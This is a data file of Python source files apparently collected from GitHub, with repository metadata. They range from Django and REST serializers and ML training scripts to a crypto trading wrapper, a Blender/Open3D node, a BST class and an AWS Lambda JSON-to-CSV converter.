+{"seq_id":"6399811552","text":"from rest_framework import serializers\nfrom metrics.models import Metric, MetricCollection\n\n\nclass MetricSerializer(serializers.ModelSerializer):\n class Meta:\n model = Metric\n fields = (\n \"time\",\n \"type\",\n \"data\",\n )\n\n\nclass MetricCollectionSerializer(serializers.ModelSerializer):\n metrics = serializers.SerializerMethodField()\n\n class Meta:\n model = MetricCollection\n fields = (\n \"type\",\n \"metrics\",\n )\n\n def get_metrics(self, metric_collection):\n metrics = metric_collection.metrics.all()\n serializer = MetricCollectionSerializer(\n metrics,\n many=True,\n )\n return serializer.data\n","repo_name":"wizenheimer/Arcadian","sub_path":"metrics/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"31232656842","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nLICENSE: MulanPSL2\nAUTHOR: cnhemiya@qq.com\nDATE: 2022-06-05 21:45\n文档说明: 图像分割裁剪\n\"\"\"\n\n\nimport paddlex as pdx\nfrom paddlex import transforms as T\nimport mod.utils\nimport mod.args\nimport mod.config as config\n\n\ndef prune():\n # 解析命令行参数\n args = mod.args.PruneXSeg()\n # 检查文件或目录是否存在\n args.check()\n # 使用 cuda gpu 还是 cpu 运算\n config.user_cude(not args.cpu)\n\n # 定义训练和验证时的 transforms\n # API说明:https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/apis/transforms/transforms.md\n train_transforms = T.Compose([\n T.Resize(target_size=512),\n T.RandomHorizontalFlip(),\n T.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n eval_transforms = T.Compose([\n T.Resize(target_size=512),\n T.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n # 定义训练和验证所用的数据集\n # API说明:https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/apis/datasets.md\n train_dataset = pdx.datasets.SegDataset(\n data_dir=args.dataset,\n file_list=args.train_list,\n label_list=args.label_list,\n transforms=train_transforms,\n num_workers=args.num_workers,\n shuffle=True)\n\n eval_dataset = pdx.datasets.SegDataset(\n data_dir=args.dataset,\n file_list=args.eval_list,\n label_list=args.label_list,\n transforms=eval_transforms,\n num_workers=args.num_workers,\n shuffle=False)\n\n # 加载模型\n print(\"读取模型 。。。读取路径:{}\".format(args.model_dir))\n model = pdx.load_model(args.model_dir)\n\n # Step 1/3: 分析模型各层参数在不同的裁剪比例下的敏感度\n # 注意:目标检测模型的裁剪依赖PaddleSlim 2.1.0\n # 注意:如果之前运行过该步骤,第二次运行时会自动加载已有的 'save_dir'/model.sensi.data,不再进行敏感度分析\n # API说明:https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md#analyze_sensitivity\n # 使用参考:https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n if not args.skip_analyze:\n print(\"敏感度分析 。。。保存路径:{}\".format(args.save_dir))\n model.analyze_sensitivity(\n dataset=eval_dataset,\n batch_size=args.batch_size,\n save_dir=args.save_dir)\n\n # Step 2/3: 根据选择的FLOPs减小比例对模型进行裁剪\n # API说明:https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md#prune\n # 使用参考:https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n print(\"对模型进行裁剪 。。。FLOPS:{}\".format(args.pruned_flops))\n model.prune(pruned_flops=args.pruned_flops)\n\n # 优化器\n # https://gitee.com/paddlepaddle/PaddleX/blob/develop/paddlex/cv/models/segmenter.py#L189\n\n # 模型训练\n # API说明:https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md\n # 使用参考:https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n # 可使用 VisualDL 查看训练指标,参考:https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/visualdl.md\n print(\"开始训练 。。。保存路径:{}\".format(args.save_dir))\n model.train(num_epochs=args.epochs,\n train_dataset=train_dataset,\n train_batch_size=args.batch_size,\n eval_dataset=eval_dataset,\n save_dir=args.save_dir,\n save_interval_epochs=args.save_interval_epochs,\n log_interval_steps=args.log_interval_steps,\n learning_rate=args.learning_rate,\n lr_decay_power=args.lr_decay_power,\n early_stop=args.early_stop,\n early_stop_patience=args.early_stop_patience,\n resume_checkpoint=args.resume_checkpoint,\n pretrain_weights=args.pretrain_weights,\n use_vdl=True)\n print(\"结束训练 。。。保存路径:{}\".format(args.save_dir))\n\n\ndef main():\n # 裁剪\n prune()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cnhemiya/bmm-paddle-helper","sub_path":"templates/paddlex_seg/prune.py","file_name":"prune.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
+{"seq_id":"33601277158","text":"from __future__ import print_function, division\n\nimport time\nfrom PIL import Image\nfrom torchvision.transforms import transforms\nfrom transforms.pad_to_square import pad_to_square\nimport numpy as np\n\nfrom utils.utils import AverageMeter, accuracy\nfrom utils.img_utils import compute_gradient, save_img\n\n\ndef test(val_loader, model, device, save_imgs=False, show=False):\n batch_time = AverageMeter()\n\n eval_fingers_recall = AverageMeter()\n eval_fingers_precision = AverageMeter()\n\n eval_frets_recall = AverageMeter()\n eval_frets_precision = AverageMeter()\n\n eval_strings_recall = AverageMeter()\n eval_strings_precision = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n\n for data_idx, data in enumerate(val_loader):\n input = data['image'].float().to(device)\n target = data['fingers'].float().to(device)\n frets = data['frets'].float().to(device)\n strings = data['strings'].float().to(device)\n target_coord = data['finger_coord']\n frets_coord = data['fret_coord']\n strings_coord = data['string_coord']\n img_number = data['img_number']\n\n # compute output\n output = model(input)\n output1 = output[0].split(input.shape[0], dim=0)\n output2 = output[1].split(input.shape[0], dim=0)\n output3 = output[2].split(input.shape[0], dim=0)\n\n if show:\n import matplotlib.pyplot as plt\n import torchvision.transforms as transforms\n fig, ax = plt.subplots(1, 3)\n ax[0].imshow(target[0][0].cpu(), cmap='gray')\n ax[1].imshow(output1[-1][0][0].cpu().detach(), cmap='gray')\n ax[2].imshow(transforms.ToPILImage()(input.cpu()[0]))\n plt.show()\n\n # measure accuracy\n accuracy(output=output1[-1].data, target=target,\n global_precision=eval_fingers_precision, global_recall=eval_fingers_recall, fingers=target_coord,\n min_dist= 10)\n\n accuracy(output=output2[-1].data, target=frets,\n global_precision=eval_frets_precision, global_recall=eval_frets_recall,\n fingers=frets_coord.unsqueeze(0), min_dist=5)\n\n accuracy(output=output3[-1].data, target=strings,\n global_precision=eval_strings_precision, global_recall=eval_strings_recall,\n fingers=strings_coord.unsqueeze(0), min_dist=5)\n\n if save_imgs:\n save_img(input.cpu().detach()[0], output1[-1][0][0].cpu().detach().numpy(), 10, 'image{num}_fingers'.format(num=data['img_number'][0]))\n save_img(input.cpu().detach()[0], output2[-1][0][0].cpu().detach().numpy(), 5, 'image{num}_frets'.format(num=data['img_number'][0]))\n save_img(input.cpu().detach()[0], output3[-1][0][0].cpu().detach().numpy(), 5, 'image{num}_strings'.format(num=data['img_number'][0]))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n print('FINGERS: \\t'\n 'Recall(%): {top1:.3f}\\t'\n 'Precision(%): {top2:.3f}\\n'\n 'FRETS: \\t'\n 'Recall(%): {top6:.3f}\\t'\n 'Precision(%): {top7:.3f}\\n'\n 'STRINGS: \\t'\n 'Recall(%): {top11:.3f}\\t'\n 'Precision(%): {top12:.3f}\\n'\n .format(top1=eval_fingers_recall.avg * 100, top2=eval_fingers_precision.avg * 100,\n top6=eval_frets_recall.avg * 100, top7=eval_frets_precision.avg * 100,\n top11=eval_strings_recall.avg * 100, top12=eval_strings_precision.avg * 100))\n\n return eval_fingers_recall.avg, eval_frets_recall.avg, eval_strings_recall.avg, eval_fingers_precision.avg, \\\n eval_frets_precision.avg, eval_strings_precision.avg","repo_name":"AlbertMitjans/chord-detection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"}
+{"seq_id":"32180112672","text":"from lib.common.msg import info, warn\nfrom lib.common.id_map_poloniex import id_to_poloniex\nfrom lib.common.id_ticker_map import id_to_ticker\nfrom lib.common.orderbook import estimate_fill_price, FillPriceEstimate\nfrom lib.trader import poloniex_api\nfrom lib.trader.trader import Trader\n\n# limit price estimate is based on (qty requested) x (overcommit_factor)\novercommit_factor = 1.1\n\nclass PoloniexTraderError(RuntimeError):\n def __init__(self, message: str):\n super().__init__(message)\n\nclass PoloniexTrader(Trader):\n\n @staticmethod\n def handles_sym(sym: str) -> bool:\n return sym in id_to_poloniex.keys()\n\n def __init__(self, sym: str, api_key: str, secret: str):\n self.pair = id_to_poloniex[sym]\n self.ticker = id_to_ticker[sym]\n self.api = poloniex_api.Poloniex(api_key, secret)\n\n def _handle_trade(self, response: dict) -> tuple[float,float]:\n if 'resultingTrades' in response.keys():\n trades = response['resultingTrades']\n total_qty_coin = sum( [float(x['amount']) for x in trades] )\n total_qty_usd = sum( [float(x['total']) for x in trades] )\n fill_price = total_qty_usd / total_qty_coin\n return [fill_price, total_qty_coin]\n elif 'error' in response.keys():\n raise PoloniexTraderError(response['error'])\n else:\n raise PoloniexTraderError(f\"unknown error : {response}\")\n\n\n def buy_market(self, qty: float, qty_in_usd: bool) -> tuple[float,float]:\n self._check_trx_balance()\n if qty_in_usd:\n qty_tokens = qty / self.api.returnTicker(self.pair)\n else:\n qty_tokens = qty\n estimate_price = estimate_fill_price(self.api.returnOrderBook(self.pair)['asks'], qty_tokens*overcommit_factor)\n response = self.api.buy(self.pair, estimate_price.limit, qty_tokens, {'fillOrKill': True})\n return self._handle_trade(response)\n\n def sell_market(self, qty_tokens: float) -> tuple[float,float]:\n self._check_trx_balance()\n estimate_price = estimate_fill_price(self.api.returnOrderBook(self.pair)['bids'], qty_tokens*overcommit_factor)\n response = self.api.sell(self.pair, estimate_price.limit, qty_tokens, {'fillOrKill': True})\n return self._handle_trade(response)\n\n def sell_limit(self, qty_tokens: float, limit_price: float, auto_top_up_commission_tokens: bool = False) -> tuple[float,float]:\n if auto_top_up_commission_tokens:\n self._check_trx_balance()\n response = self.api.sell(self.pair, limit_price, qty_tokens, {'fillOrKill': True, 'immediateOrCancel': True})\n return self._handle_trade(response)\n\n\n def estimate_fill_price(self, qty: float, side: str) -> FillPriceEstimate:\n assert side in [\"buy\", \"sell\"]\n if side == \"buy\":\n return estimate_fill_price(self.api.returnOrderBook(self.pair)['asks'], qty*overcommit_factor)\n else:\n return estimate_fill_price(self.api.returnOrderBook(self.pair)['bids'], qty*overcommit_factor)\n\n def get_available_qty(self) -> float:\n return float(self.api.returnBalances()[self.ticker])\n\n def _check_trx_balance(self):\n qty = float(self.api.returnBalances()['TRX'])\n market_price = float(self.api.returnOrderBook(\"USDT_TRX\")['asks'][1][0])\n if qty * market_price < 50:\n add_qty = round(10 / market_price)\n info(f\"PoloniexTrader: buying {add_qty:.1f} additional TRX tokens\")\n self.api.buy(\"USDT_TRX\", market_price*1.01, add_qty, {'fillOrKill': True})\n new_qty = float(self.api.returnBalances()['TRX'])\n if new_qty < add_qty:\n warn(\"PoloniexTrader: failed to buy TRX tokens\")\n","repo_name":"AbigalChulchill/investment-utils","sub_path":"lib/trader/poloniex_trader.py","file_name":"poloniex_trader.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"}
+{"seq_id":"25522074669","text":"import sys\n\n\ndef dfs(cnt):\n global N, M, num_list, visited\n\n if cnt == M:\n sys.stdout.write(' '.join(answer) + '\\n')\n return\n\n for i in range(N):\n if not visited[i]:\n visited[i] = 1\n answer.append(str(num_list[i]))\n dfs(cnt+1)\n visited[i] = 0\n answer.pop()\n\n\nif __name__ == '__main__':\n N, M = map(int, input().split())\n num_list = sorted(list(map(int, sys.stdin.readline().split())))\n visited = [0 for _ in range(N)]\n answer = []\n\n dfs(0)","repo_name":"jjungyeun/AlgorithmStudy2021","sub_path":"Baekjoon/2106/15654.py","file_name":"15654.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6326336893","text":"\nimport copy\nimport bpy\nfrom bpy.props import EnumProperty, IntProperty\nfrom mathutils import Matrix\n\nimport sverchok\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode\nfrom sverchok.utils.nodes_mixins.recursive_nodes import SvRecursiveNode\n\nfrom sverchok_open3d.dependencies import open3d as o3d\nfrom sverchok.utils.dummy_nodes import add_dummy\n\nif o3d is None:\n add_dummy('SvO3TriangleMeshSamplingNode', 'Triangle Mesh Sampling', 'open3d')\nelse:\n class SvO3TriangleMeshSamplingNode(bpy.types.Node, SverchCustomTreeNode, SvRecursiveNode):\n \"\"\"\n Triggers: O3D Mesh Sampling\n Tooltip: Points over Open3d mesh. Mesh to Point Cloud\n \"\"\"\n bl_idname = 'SvO3TriangleMeshSamplingNode'\n bl_label = 'Triangle Mesh Sampling'\n bl_icon = 'MESH_DATA'\n sv_icon = 'SV_RANDOM_NUM_GEN'\n methods = [\n ('UNIFORM', \"Uniform\", \"Uniform Sampling\", 0),\n ('POISSON', \"Poisson Disk\", \"Poisson Disk Sampling\", 1),\n ]\n normal_methods = [\n ('TRIANGLES', \"From Faces\", \"Calculate Normals From Faces\", 0),\n ('VERTEX', \"From Vertex\", \"Calculate Normals From Vertices\", 1),\n ('NONE', \"None\", \"If mesh does not have normals, the point cloud will not have normals\", 2),\n ]\n\n method: EnumProperty(\n name=\"Method\",\n items=methods,\n default='POISSON',\n update=updateNode)\n normal_method: EnumProperty(\n name=\"Normal\",\n items=normal_methods,\n default='TRIANGLES',\n update=updateNode)\n\n num_points: IntProperty(\n name=\"Point Number\",\n default=100,\n update=updateNode)\n init_factor: IntProperty(\n name=\"Init Factor\",\n description='Initial Points will be Init Factor X Number of points ',\n default=5,\n update=updateNode)\n seed: IntProperty(\n name=\"Seed\",\n description='Random Seed Value, -1 to use a different every update',\n default=1,\n update=updateNode)\n\n def sv_init(self, context):\n self.inputs.new('SvO3TriangleMeshSocket', \"O3D Triangle Mesh\").is_mandatory = True\n num_points = self.inputs.new('SvStringsSocket', \"Points Number\")\n num_points.prop_name = 'num_points'\n num_points.nesting_level = 1\n num_points.pre_processing = 'ONE_ITEM'\n seed = self.inputs.new('SvStringsSocket', \"Seed\")\n seed.prop_name = 'seed'\n seed.nesting_level = 1\n seed.pre_processing = 'ONE_ITEM'\n\n self.outputs.new('SvO3PointCloudSocket', 'O3D Point Cloud')\n\n def draw_buttons(self, context, layout):\n layout.prop(self, 'method')\n layout.prop(self, 'normal_method')\n\n def draw_buttons_ext(self, context, layout):\n layout.prop(self, 'list_match')\n self.draw_buttons(context, layout)\n if self.method == 'POISSON':\n layout.prop(self, 'init_factor')\n\n def rclick_menu(self, context, layout):\n layout.prop_menu_enum(self, \"list_match\", text=\"List Match\")\n\n def process_data(self, params):\n\n pcd_out = []\n\n for mesh, points_num, seed in zip(*params):\n\n if self.normal_method == 'TRIANGLES':\n use_triangle_normal = True\n elif self.normal_method == 'VERTEX':\n use_triangle_normal = False\n mesh = copy.deepcopy(mesh)\n mesh.compute_vertex_normals()\n else:\n use_triangle_normal = False\n if self.method == 'POISSON':\n pcd = mesh.sample_points_poisson_disk(\n points_num,\n init_factor=self.init_factor,\n use_triangle_normal=use_triangle_normal,\n seed=seed)\n else:\n pcd = mesh.sample_points_uniformly(\n number_of_points=points_num,\n use_triangle_normal=use_triangle_normal,\n seed=seed)\n pcd_out.append(pcd)\n\n return pcd_out\n\n\n\ndef register():\n if o3d is not None:\n bpy.utils.register_class(SvO3TriangleMeshSamplingNode)\n\ndef unregister():\n if o3d is not None:\n bpy.utils.unregister_class(SvO3TriangleMeshSamplingNode)\n","repo_name":"vicdoval/sverchok-open3d","sub_path":"nodes/triangle_mesh/triangle_mesh_sampling.py","file_name":"triangle_mesh_sampling.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"}
+{"seq_id":"35885001249","text":"import requests\nfrom lxml import html\nimport urllib\n\nid = 152293\ndomain = 'https://www.russianfood.com/recipes/recipe.php?rid='\n\ndef getContent(id):\n\n url = domain + str(id)\n\n print('getContent(): send request to %s' % url)\n try:\n r = requests.get(url, timeout=30)\n except Exception as e:\n print(e)\n\n content = ''\n if r.reason == 'OK':\n print('getContent(): status OK')\n \n content = r.text\n \n return content\n\ndef get_products(content):\n tree = html.fromstring(content)\n\n products = []\n for element in tree.xpath('//td[@class=\"padding_l padding_r\"]/span'):\n product = element.text.lower()\n if '-' in product:\n product = product.split(' - ')[0]\n\n products.append(product)\n\n return products\n\ndef get_label(content):\n tree = html.fromstring(content)\n\n label = None\n for element in tree.xpath('//span[@class=\"rcp\"]'):\n label = element.text\n return label\n\ndef get_text(content):\n tree = html.fromstring(content)\n\n text = ''\n for element in tree.xpath('//div[@class=\"step_n\"]/p'):\n text += element.text + ' '\n return text","repo_name":"kuznetsov-m/Datamonetize-hack","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"25016010355","text":"#!/Users/htlin/.pyenv/versions/automator/bin/python\n# -*- coding: utf-8 -*-\n# title: tweet\n# date: \"2023-03-25\"\n# @raycast.title Tweet\n# @raycast.author HTLin the 🦎\n# @raycast.authorURL https://github.com/htlin222\n# @raycast.description\n\n# @raycast.icon 🐦\n# @raycast.mode silent\n# @raycast.packageName System\n# @raycast.schemaVersion 1\n\nimport os\nimport yaml\nimport tweepy\nfrom pathlib import Path\n\n# Get path to home directory\nhome_dir = str(Path.home())\n\n# Define path to YAML file\nyaml_path = os.path.join(home_dir, 'KEY', 'twitter.yaml')\n\n# Load API keys and access tokens from YAML file\nwith open(yaml_path, 'r') as file:\n config = yaml.safe_load(file)\n\nconsumer_key = config['consumer_key']\nconsumer_secret = config['consumer_secret']\naccess_token = config['access_token']\naccess_token_secret = config['access_token_secret']\n\n# Authenticate with Twitter API\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\n# Create API object\napi = tweepy.API(auth)\n\n# Create a tweet\napi.update_status(\"Hello Tweepy\")\n","repo_name":"htlin222/dotfiles","sub_path":"pyscripts.symlink/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"44570018640","text":"from django.http import HttpResponse, Http404\nfrom datetime import datetime, timedelta\nfrom django.shortcuts import render\nfrom django.template import loader\n\n\ndef hello(request):\n return HttpResponse('hello, world')\n\n\ndef hours_head(request, offset):\n try:\n offset = int(offset)\n except ValueError:\n raise Http404\n dt = datetime.now() + timedelta(hours=offset)\n html = 'In {}hours, it will be {}.'.format(offset, dt)\n return HttpResponse(html)\n\n\ndef current_datetime(request):\n now = datetime.now()\n t = loader.get_template('current_datetime.html')\n print(request.path)\n print(request.get_host())\n print(request.get_full_path())\n print(request.is_secure())\n values = request.META.items()\n html = []\n for k, v in values:\n html.append((k, v))\n c = {\n 'now': now,\n 'html': html,\n }\n return HttpResponse(t.render(c, request))\n\n\n\ndef searh_form(request):\n return render(request, 'searh_form.html')\n","repo_name":"hdguodada/djangobook","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72463613162","text":"# 치킨 배달(순서가 바뀌어도 결과에 영향이 없으므로 조합)\nfrom itertools import combinations\n\n\ndef get_sum(location_home, case):\n result = 0\n for x1, y1 in location_home:\n temp = int(1e9)\n for x2, y2 in case:\n temp = min(temp, abs(x1 - x2) + abs(y1 - y2))\n result += temp\n return result\n\n\nn, m = map(int, input().split())\ngraph = []\nlocation_home = []\nlocation_chicken = []\nfor i in range(n):\n data = list(map(int, input().split()))\n graph.append(data)\n for j in range(n):\n if data[j] == 1:\n location_home.append((i, j))\n elif data[j] == 2:\n location_chicken.append((i, j))\n\ncases = combinations(location_chicken, m)\nresult = int(1e9)\nfor case in cases:\n result = min(result, get_sum(location_home, case))\n\nprint(result)\n","repo_name":"Dong-Jun-Shin/Study_Algorithm_Python","sub_path":"Coding_test/practice_turn_2/02_implementation/prac_turn2_Q_13.py","file_name":"prac_turn2_Q_13.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23864039380","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Recommendation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255, null=True)),\n ('info', models.TextField(null=True)),\n ('map_img', models.ImageField(upload_to=b'maps', blank=True)),\n ('image', models.ImageField(upload_to=b'recommendations')),\n ('phone_number', models.CharField(max_length=13, null=True)),\n ],\n ),\n ]\n","repo_name":"RababKM/Recoms","sub_path":"main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"32408571593","text":"import cv2 as cv \nimport numpy as np \n\nimg = cv.imread('../Images/thresholding.png',0)\ncv.imshow('Before binarization',img)\ncv.waitKey(0)\n\nthresh, binarized = cv.threshold(img,0,255,cv.THRESH_BINARY+cv.THRESH_OTSU)\n\n#Threshold value as found by Otsu's Algorithm\nprint(\"Threshold value: \",thresh)\n\ncv.imshow('Binarized Image',binarized)\ncv.waitKey(0)\n","repo_name":"mahirjain25/Digital-Image-Processing","sub_path":"Thresholding/otsu.py","file_name":"otsu.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"22056181837","text":"import numpy as np\n\ndef vol_tehrahedron(poly):\n \"\"\"volume of a irregular tetrahedron\"\"\"\n a = np.array(poly[0])\n b = np.array(poly[1])\n c = np.array(poly[2])\n d = np.array(poly[3])\n return abs(np.dot((a-d), np.cross((b-d),(c-d))) / 6)\n\ndef central_p(poly1,poly2):\n central_point = np.array([0.0, 0.0, 0.0])\n for i in range(len(poly1)):\n central_point += np.array(poly1[i]) + np.array(poly2[i])\n return central_point/ (len(poly1)) / 2\n\ndef vol(poly1,poly2):\n \"\"\"\"volume of a zone defined by two polygon bases \"\"\"\n c_point = central_p(poly1, poly2)\n c_point = (c_point[0], c_point[1], c_point[2])\n vol_therah = 0\n N = len(poly1)\n poly1.append(poly1[0])\n poly2.append(poly2[0])\n for i in range(N-2):\n # the upper part\n tehrahedron = [c_point,poly1[0], poly1[i+1], poly1[i+2]]\n vol_therah += vol_tehrahedron(tehrahedron)\n # the bottom part\n tehrahedron = [c_point,poly2[0], poly2[i+1], poly2[i+2]]\n vol_therah += vol_tehrahedron(tehrahedron)\n # the middle part\n for i in range(N):\n tehrahedron = [c_point, poly1[i], poly2[i], poly2[i+1]]\n vol_therah += vol_tehrahedron(tehrahedron)\n tehrahedron = [c_point, poly1[i], poly1[i+1], poly2[i]]\n vol_therah += vol_tehrahedron(tehrahedron)\n return vol_therah","repo_name":"cmiller8/eppy","sub_path":"eppy/geometry/volume_zone.py","file_name":"volume_zone.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
+{"seq_id":"42804431675","text":"import os\nimport re\nimport PyPDF2\nfrom langchain.callbacks import get_openai_callback\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.schema import HumanMessage\nfrom config.config import TOKEN\n\n# Set the OpenAI API key\nos.environ['OPENAI_API_KEY'] = TOKEN\n\n# Open the PDF file\nwith open('../input/ABC123_verificacion_vehicular.pdf', 'rb') as pdfFileObj:\n # Create a PDF reader object\n pdfReader = PyPDF2.PdfReader(pdfFileObj)\n\n # Get the number of pages in the PDF file\n print(f\"Number of pages: {len(pdfReader.pages)}\")\n\n # Get the first page of the PDF\n pageObj = pdfReader.pages[0]\n\n # Extract the text from the page and remove extra spaces between characters\n text = re.sub(r\"(?<=\\w) (?=\\w)\", \"\", pageObj.extract_text())\n\n # Search for the license plate in the text\n match = re.search(r'(placa|Número de Placa|patente|license_plate)(.{0,30})', text, re.IGNORECASE | re.DOTALL)\n if match:\n segment = match.group(0) # The license plate and the following 30 characters\n else:\n print(\"No license plate found in the document.\")\n exit(1)\n\n# Construct the content for the chat\ncontent = \"You are a text interpreter API. Your responses should always be in JSON format, using the following \" \\\n \"structure: {\\\"result\\\": \\\"$result\\\"}. Now, please search the license_plate or also called placa in spanish in \" \\\n \"the following text: \" + segment\n\n# Initialize the chat model\nchat = ChatOpenAI(temperature=0, model_name=\"gpt-3.5-turbo\")\n\n# Use the OpenAI callback to print the chat response and callback\nwith get_openai_callback() as cb:\n print(chat([HumanMessage(content=content)]))\n print(cb)\n","repo_name":"ldmarz/nlp-scripts","sub_path":"src/text_from_pdf_extractor.py","file_name":"text_from_pdf_extractor.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"33593164302","text":"class Node:\n def __init__(self, data=None, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\nclass BST:\n def __init__(self):\n self.root = None\n self.size = 0\n\n def insert(self, item):\n node = Node(item)\n if self.root is None:\n self.root = node\n else:\n current = self.root\n while True:\n if item < current.data:\n if current.left is None:\n current.left = node\n break\n else:\n current = current.left\n else:\n if current.right is None:\n current.right = node\n break\n else:\n current = current.right\n self.size += 1\n\n def delete(self, item):\n self.root = self._delete(self.root, item)\n\n def _delete(self, node, item):\n if node is None:\n return None\n if item < node.data:\n node.left = self._delete(node.left, item)\n elif item > node.data:\n node.right = self._delete(node.right, item)\n else:\n if node.left is None:\n return node.right\n elif node.right is None:\n return node.left\n else:\n min_node = self._find_min(node.right)\n node.data = min_node.data\n node.right = self._delete(node.right, min_node.data)\n self.size -= 1\n return node\n\n def _find_min(self, node):\n while node.left is not None:\n node = node.left\n return node\n\n def search(self, item):\n current = self.root\n while current is not None:\n if item == current.data:\n return True\n elif item < current.data:\n current = current.left\n else:\n current = current.right\n return False\n\n def size(self):\n return self.size\n","repo_name":"nanduskumar33/pythonAssignments","sub_path":"bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37124679687","text":"import json\nimport urllib.parse\nimport boto3\nimport csv\nprint('Loading function')\ns3 = boto3.client('s3')\n\ndef lambda_handler(event, context):\n print(\"Received event: \" + json.dumps(event, indent=2))\n # Get the object from the event and show its content type\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\n if \"json\" in key:\n try:\n response = s3.get_object(Bucket=bucket, Key=key)\n response_body = response['Body'].read()\n data = json.loads(response_body.decode('utf-8'))\n Flat_json = flatten_json(data['web-app']) \n write_csv(Flat_json,'|')\n upload_file()\n #write the data into '/tmp' folder\n return response['ContentType']\n except Exception as e:\n print(e)\n print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))\n raise e\n \ndef flatten_json(y):\n out = {}\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a],name +a+ '|')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '|')\n i += 1\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out\n \n# Upload the file\ndef upload_file():\n #Method 2: Client.put_object()\n s3 = boto3.resource('s3')\n #try:\n #print('bucketname'+str(bucket))\n s3.Bucket('testingdmsunique').upload_file(r'/tmp/SampleJson.csv', 'SampleJson1.csv')\n #except ClientError as e:\n # logging.error(type(e))\n # return False\n return True\n\ndef write_csv(flat_json,delim):\n data_file = open(r'/tmp/SampleJson.csv', 'w',newline='') \n # create the csv writer object \n csv_writer = csv.writer(data_file) \n # Counter variable used for writing \n # headers to the CSV file \n count = 0\n count2 = 0\n print(data_file)\n \n for f in flat_json: \n if count == 0: \n # Writing headers of CSV file \n header = flat_json.keys()\n csv_writer.writerow(header) \n count += 1 \n # Writing data of CSV file \n for k,v in flat_json.items():\n concat = str(k)+str(delim)+str(v)\n csv_writer.writerow([concat])\n data_file.close()\n \n \n","repo_name":"divadf/dms-fileconv","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
